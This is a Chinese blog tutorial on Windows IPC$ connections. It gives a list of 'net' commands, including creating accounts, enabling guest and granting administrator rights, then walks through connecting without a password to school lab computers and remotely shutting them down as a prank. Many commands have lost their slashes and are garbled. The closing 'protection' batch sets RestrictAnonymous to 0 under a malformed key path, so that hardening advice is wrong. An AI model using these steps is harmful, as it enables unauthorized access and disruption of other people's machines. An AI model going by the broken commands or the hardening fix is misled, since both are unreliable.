挺久没更新了,今天来更新一篇IPC连接操作,为了这篇文章我差点没嗝屁
首先,IPC连接命令直接贴给你们了
net use ipipc$ user 建立IPC空链接
net use ipipc$ 密码 user用户名 建立IPC非空链接
net use h ipc$ 密码 user用户名 直接登陆后映射对方C:到本地为H
net use h ipc$ 登陆后映射对方C:到本地为H
net use ipipc$ del 删除IPC链接
net use h del 删除映射对方到本地的为H的映射
net user 用户名 密码 add 建立用户
net user guest activeyes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如net start telnet, net start schedule)
net stop 服务名 停止某服务
net time 目标ip 查看对方时间
net time 目标ip set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip 文本信息 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ del 删除ipc$共享
net share c$ del 删除C:共享
然后开始我们的行动【滑稽】
因为电脑室电脑有极域电子教室,所以开着ipc,也可以用net share命令来看看
我们可以看到有个IPC的服务,这时候就来
net use \\%ip%\ipc$ "%password%" /user:%user%
(这里面%ip%代表要连接到的电脑IP,%password%表示要连接到的电脑密码,%user%表示要连接到的电脑名称)
如果不知道电脑名称的话就用net view来看看
我这里就不看了,极域电子教室下都是STU+编号,如STU27
IP的话也有规律,192.168.0.1+编号,如192.168.0.127
密码的话是没有的
那么这就很NICE
连接试试
(此处暂时不贴图)
连接后我们就可以直接远程关机,如命令
shutdown -m \\%ip% -s -t 0
(%ip%代表要连接到的电脑IP)
然后就妙了,老师一脸懵,同学一阵欢呼
其实IPC连接不仅仅是只有这个功能,可以搞个极域电子教室玩玩,看看里面有什么功能你就会知道IPC有多么的有用
防护篇
如何关闭IPC空密码连接呢(电脑没有密码就连接不到你)
粘贴到记事本后缀名改成bat运行
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous" /v "RestrictAnonymous" /d 00000000 /t REG_dword /f
修改注册表策略
还可以关闭139,445端口
同样是bat文件运行
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit@echo off color 1f title 关闭135 445 端口echo. echo. echo. echo 正在关闭135端口 请稍候… netsh advfirewall firewall add rule name = "Disable port 135 - TCP" dir = in action = block protocol = TCP localport = 135,137,138,139echo. netsh advfirewall firewall add rule name = "Disable port 135 - UDP" dir = in action = block protocol = UDP localport = 135,137,138,139echo. echo 正在关闭445端口 请稍候… netsh advfirewall firewall add rule name = "Disable port 445 - TCP" dir = in action = block protocol = TCP localport = 445echo. netsh advfirewall firewall add rule name = "Disable port 445 - UDP" dir = in action = block protocol = UDP localport = 445echo.echo 按任意键退出 pause>nul
这个时候就可以了